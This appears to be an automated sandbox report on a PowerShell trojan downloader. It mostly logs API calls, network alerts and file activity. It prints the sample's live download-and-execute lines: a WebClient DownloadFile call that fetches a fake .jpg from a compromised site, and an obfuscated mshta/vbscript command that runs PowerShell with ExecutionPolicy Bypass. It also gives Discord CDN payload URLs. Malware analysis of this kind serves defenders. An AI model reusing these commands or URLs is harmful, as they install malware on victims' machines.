popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

qv55b3lqjXhJQckX.jpg.ps1

Antivirus GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 31, 2021, 11:22 a.m. May 31, 2021, 11:24 a.m.
Size 1.2KB
Type ASCII text, with CRLF line terminators
MD5 6ee03a2d6b4558fa09cdf1e33dcaa897
SHA256 cd4cddc487e2666f0c41cce589d535f726d13c40810be3900c3e94696a132eed
CRC32 94B9E537
ssdeep 24:lqnyah4CoT8V7O+gbb8oT8V7L+gbbjb+PKQrjZkyzebeS:Anyah4Co8nYb8o8IYbjb+CQ3Zky6bb
Yara None matched

Name Response Post-Analysis Lookup
lavishcuisine.com
A 192.169.204.60
192.169.204.60
cdn.discordapp.com
A 162.159.135.233
A 162.159.134.233
A 162.159.129.233
A 162.159.130.233
A 162.159.133.233
162.159.134.233
IP Address Status Action
162.159.135.233 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
192.169.204.60 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49811 -> 192.169.204.60:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49809 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49810 -> 192.169.204.60:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49809
162.159.135.233:443 		C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Mode LastWriteTime Length Name
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: d---- 2021-05-31 오전 11:22 Start
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\qv55b3lqjXhJQckX.jpg.ps1:20 char:50
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + if((New-Object System.Net.WebClient).DownloadFile <<<< ('https://lavishcuisin
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: e.com/wp-content/uploads/2015/v4ZH58inZ8qGCx2B.jpg' , $ali + 'msynci.ps1')){
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: mshta
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msynci"+".ps1'"", 0:close")
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The term 'C:\Users\Public\msynci.ps1' is not recognized as the name of a cmdlet
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: , function, script file, or operable program. Check the spelling of the name, o
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: r if a path was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:2
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + & <<<< 'C:\Users\Public\msynci.ps1'
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (C:\Users\Public\msynci.ps1:Stri
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ng) [], CommandNotFoundException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000077
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050237d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050237d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0505dc08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00570898
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571558
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005710d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005710d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005710d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00570d18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00571658
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005708d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00570dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/834258459628535898/844363329371897866/firefox.lnk
suspicious_features GET method with no useragent header suspicious_request GET https://cdn.discordapp.com/attachments/834258459628535898/846168516519657512/firefox.bat
request GET https://cdn.discordapp.com/attachments/834258459628535898/844363329371897866/firefox.lnk
request GET https://cdn.discordapp.com/attachments/834258459628535898/846168516519657512/firefox.bat
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f49000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05861000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02893000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02894000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06740000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x067dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f4d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 8564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05a19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 4980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73772000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc91000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Microsoft Arts\Start\firefox.lnk
file C:\Users\Public\firefox.bat
file C:\ProgramData\Microsoft Arts\Start\firefox.lnk
file C:\Users\Public\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msynci"+".ps1'"", 0:close")
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msynci.ps1'
cmdline powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msynci.ps1'
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -ExecutionPolicy Bypass & 'C:\Users\Public\msynci.ps1'
filepath: powershell
1 1 0
ESET-NOD32 PowerShell/TrojanDownloader.Agent.DVJ
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received W`´H‡QASš(d¸ƒq.5A­XÅÜn”DOWNGRD —  GŒ-øzé€Ã˜¬Ää­ìP9]wソž%®e~ÃÀÿ 
Data received  ò
